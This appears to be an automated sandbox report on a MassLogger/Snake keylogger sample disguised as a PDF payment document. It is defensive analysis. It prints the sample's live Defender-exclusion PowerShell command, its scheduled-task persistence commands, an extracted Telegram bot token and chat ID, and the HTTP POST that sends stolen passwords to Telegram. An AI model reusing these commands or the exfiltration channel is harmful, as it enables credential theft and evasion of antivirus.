Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BEPZA MT103 Credit.pdf.exe

Overview

General Information

Sample name:BEPZA MT103 Credit.pdf.exe
Analysis ID:1665813
MD5:ef4d4ab7e588827c7a17293b53a30d1f
SHA1:6e2fd3bc90fce07f121e9eb3ad94545f30773ec6
SHA256:c6de8c6d5228fa7a6101a2cf1574d974f48d8e6caf1c862cc5004d36cf3d527b
Tags:exeuser-James_inthe_box
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • BEPZA MT103 Credit.pdf.exe (PID: 8092 cmdline: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)
    • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5740 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7828 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BEPZA MT103 Credit.pdf.exe (PID: 4012 cmdline: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)
  • YEGIgzyAhkvT.exe (PID: 7996 cmdline: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe MD5: EF4D4AB7E588827C7A17293B53A30D1F)
    • schtasks.exe (PID: 7836 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YEGIgzyAhkvT.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)
    • YEGIgzyAhkvT.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" MD5: EF4D4AB7E588827C7A17293B53A30D1F)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs", "Telegram Chatid": "7135428463"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
    00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
          00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 27 entries
            SourceRuleDescriptionAuthorStrings
            10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xf1b7:$a1: get_encryptedPassword
                • 0xef52:$a3: get_timePasswordChanged
                • 0xf073:$a4: get_passwordField
                • 0xf1cd:$a5: set_encryptedPassword
                • 0x10b29:$a7: get_logins
                • 0x107da:$a8: GetOutlookPasswords
                • 0x105cc:$a9: StartKeylogger
                • 0x10a79:$a10: KeyLoggerEventArgs
                • 0x10629:$a11: KeyLoggerEventArgsEventHandler
                0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                  0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 20 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", CommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", CommandLine|base64offset|contains: 1=t, Image: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, NewProcessName: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, OriginalFileName: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ProcessId: 8092, ProcessName: BEPZA MT103 Credit.pdf.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", ProcessId: 7804, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", ProcessId: 7804, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe, ParentImage: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe, ParentProcessId: 7996, ParentProcessName: YEGIgzyAhkvT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp", ProcessId: 7836, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", ProcessId: 7828, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe", ProcessId: 7804, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe", ParentImage: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe, ParentProcessId: 8092, ParentProcessName: BEPZA MT103 Credit.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp", ProcessId: 7828, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-15T21:30:30.734705+020020577441Malware Command and Control Activity Detected192.168.2.549698149.154.167.220443TCP
                    2025-04-15T21:30:30.779130+020020577441Malware Command and Control Activity Detected192.168.2.549699149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-15T21:30:22.067131+020028032742Potentially Bad Traffic192.168.2.549689132.226.247.7380TCP
                    2025-04-15T21:30:22.223361+020028032742Potentially Bad Traffic192.168.2.549693132.226.247.7380TCP
                    2025-04-15T21:30:29.707778+020028032742Potentially Bad Traffic192.168.2.549689132.226.247.7380TCP
                    2025-04-15T21:30:29.817129+020028032742Potentially Bad Traffic192.168.2.549693132.226.247.7380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-15T21:30:30.264471+020018100081Potentially Bad Traffic192.168.2.549699149.154.167.220443TCP
                    2025-04-15T21:30:30.276455+020018100081Potentially Bad Traffic192.168.2.549698149.154.167.220443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: BEPZA MT103 Credit.pdf.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeAvira: detection malicious, Label: HEUR/AGEN.1307338
                    Source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs", "Telegram Chatid": "7135428463"}
                    Source: YEGIgzyAhkvT.exe.8120.16.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendMessage"}
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeReversingLabs: Detection: 75%
                    Source: BEPZA MT103 Credit.pdf.exeVirustotal: Detection: 66%Perma Link
                    Source: BEPZA MT103 Credit.pdf.exeReversingLabs: Detection: 75%
                    Source: Submited SampleNeural Call Log Analysis: 99.8%

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 4x nop then jmp 02B99731h10_2_02B99480
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 4x nop then jmp 02B99E5Ah10_2_02B99A30
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 4x nop then jmp 02B99E5Ah10_2_02B99D87
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 4x nop then jmp 01269731h16_2_01269480
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 4x nop then jmp 01269E5Ah16_2_01269A40
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 4x nop then jmp 01269E5Ah16_2_01269A30
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 4x nop then jmp 01269E5Ah16_2_01269D87

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49699 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49698 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49698 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49699 -> 149.154.167.220:443
                    Source: unknownDNS query: name: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c32738635eaHost: api.telegram.orgContent-Length: 1095Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c3273964b09Host: api.telegram.orgContent-Length: 1095Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49689 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 132.226.247.73:80
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c32738635eaHost: api.telegram.orgContent-Length: 1095Connection: Keep-Alive
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3718729312.0000000006450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m1
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 0000000B.00000002.1310845235.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
